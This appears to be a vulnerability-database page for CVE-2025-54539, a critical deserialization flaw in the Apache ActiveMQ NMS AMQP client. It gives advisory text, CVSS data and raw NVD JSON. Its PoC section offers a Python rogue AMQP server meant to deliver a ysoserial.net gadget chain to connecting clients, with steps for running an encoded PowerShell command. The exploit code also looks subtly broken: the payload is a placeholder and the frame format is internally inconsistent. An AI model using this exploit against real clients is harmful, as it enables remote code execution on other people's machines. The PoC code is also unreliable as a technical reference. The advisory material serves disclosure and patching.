Security Vulnerability Report
CVE-2025-54539 CVSS 9.8 CRITICAL

CVE-2025-54539

Published: 2025-10-16 09:15:35
Last Modified: 2025-11-04 22:16:29

Description

A Deserialization of Untrusted Data vulnerability exists in the Apache ActiveMQ NMS AMQP Client.

This issue affects all versions of Apache ActiveMQ NMS AMQP up to and including 2.3.0, when establishing connections to untrusted AMQP servers. Malicious servers could exploit unbounded deserialization logic present in the client to craft responses that may lead to arbitrary code execution on the client side.

Although version 2.1.0 introduced a mechanism to restrict deserialization via allow/deny lists, the protection was found to be bypassable under certain conditions.

In line with Microsoft’s deprecation of binary serialization in .NET 9, the project is evaluating the removal of .NET binary serialization support from the NMS API entirely in future releases.

Mitigation and Recommendations:
Users are strongly encouraged to upgrade to version 2.4.0 or later, which resolves the issue. Additionally, projects depending on NMS-AMQP should migrate away from .NET binary serialization as part of a long-term hardening strategy.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:apache:activemq_nms_amqp:*:*:*:*:*:*:*:* - VULNERABLE
Apache ActiveMQ NMS AMQP Client <= 2.3.0
Apache ActiveMQ NMS AMQP Client 2.1.0 (allow/deny list mechanism can be bypassed)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-54539 PoC - Apache ActiveMQ NMS AMQP Deserialization RCE
# This PoC demonstrates the exploitation of the deserialization vulnerability
# in Apache ActiveMQ NMS AMQP Client <= 2.3.0

import socket
import struct
import sys

# AMQP Protocol Header (simplified)
AMQP_HEADER = b'AMQP\x00\x01\x00\x00'


def create_malicious_response(payload):
    """
    Create a malicious AMQP response containing a .NET deserialization payload.
    The payload should be a BinaryFormatter serialized object with a gadget chain
    that leads to RCE (e.g., using ysoserial.net generated payload).
    """
    # AMQP frame structure: frame-type, channel, size, payload, end-marker
    frame_type = 0x01  # Method frame
    channel = 0x00

    # Construct AMQP method frame with malicious serialized data
    method_payload = payload
    frame_size = len(method_payload) + 4  # including class-id and method-id

    frame = struct.pack('>BHI', frame_type, channel, frame_size)
    frame += method_payload
    frame += b'\xCE'  # frame end marker

    return frame


def generate_gadget_payload(command):
    """
    Generate a .NET deserialization gadget chain payload.
    In a real exploit, use ysoserial.net to generate this:
    ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "<command>"
    """
    # Placeholder for actual .NET BinaryFormatter gadget chain
    # Replace with actual payload generated by ysoserial.net
    # Example: TypeConfuseDelegate, ObjectDataProvider, WindowsClaimsIdentity, etc.
    placeholder_payload = (
        b'\x00\x01\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00'
        b'\x00\x00\x00\x00\x04\x01\x00\x00\x00'
    )
    return placeholder_payload


def run_malicious_server(host='0.0.0.0', port=5672, command='calc.exe'):
    """
    Run a fake malicious AMQP server that exploits CVE-2025-54539.
    """
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server_socket.bind((host, port))
    server_socket.listen(1)

    print(f"[*] Malicious AMQP server listening on {host}:{port}")
    print(f"[*] Command to execute: {command}")

    while True:
        client_socket, addr = server_socket.accept()
        print(f"[+] Client connected from {addr}")

        # Send AMQP protocol header
        client_socket.send(AMQP_HEADER)

        # Receive client's connection.start
        data = client_socket.recv(4096)
        print(f"[*] Received client data: {len(data)} bytes")

        # Send malicious response with deserialization payload
        gadget = generate_gadget_payload(command)
        malicious_frame = create_malicious_response(gadget)
        client_socket.send(malicious_frame)
        print(f"[+] Sent malicious payload ({len(malicious_frame)} bytes)")
        print(f"[+] Exploit delivered! Check target for code execution.")

        client_socket.close()


if __name__ == '__main__':
    cmd = sys.argv[1] if len(sys.argv) > 1 else 'calc.exe'
    run_malicious_server(command=cmd)

# Usage:
# 1. Generate actual payload with ysoserial.net:
#    ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "powershell -enc <base64_payload>"
# 2. Replace placeholder_payload with the generated BinaryFormatter payload
# 3. Run this script to start the malicious AMQP server
# 4. Wait for vulnerable NMS AMQP Client to connect
# 5. Code execution achieved on client side
```

References

https://lists.apache.org/thread/9k684j07ljrshy3hxwhj5m0xjmkz1g2n (Mailing List, Vendor Advisory)
http://www.openwall.com/lists/oss-security/2025/10/15/3

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-54539",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-16T09:15:34.680",
    "lastModified": "2025-11-04T22:16:28.940",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A Deserialization of Untrusted Data vulnerability exists in the Apache ActiveMQ NMS AMQP Client.\n\nThis issue affects all versions of Apache ActiveMQ NMS AMQP up to and including 2.3.0, when establishing connections to untrusted AMQP servers. Malicious servers could exploit unbounded deserialization logic present in the client to craft responses that may lead to arbitrary code execution on the client side.\n\nAlthough version 2.1.0 introduced a mechanism to restrict deserialization via allow/deny lists, the protection was found to be bypassable under certain conditions.\n\nIn line with Microsoft’s deprecation of binary serialization in .NET 9, the project is evaluating the removal of .NET binary serialization support from the NMS API entirely in future releases.\n\nMitigation and Recommendations:\nUsers are strongly encouraged to upgrade to version 2.4.0 or later, which resolves the issue.\nAdditionally, projects depending on NMS-AMQP should migrate away from .NET binary serialization as part of a long-term hardening strategy."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-502"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:apache:activemq_nms_amqp:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.4.0",
                "matchCriteriaId": "933FFB4D-689A-4834-8733-EE9896BFCBD5"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://lists.apache.org/thread/9k684j07ljrshy3hxwhj5m0xjmkz1g2n",
        "source": "[email protected]",
        "tags": ["Mailing List", "Vendor Advisory"]
      },
      {
        "url": "http://www.openwall.com/lists/oss-security/2025/10/15/3",
        "source": "af854a3a-2127-422b-91ae-364da2661108"
      }
    ]
  }
}
```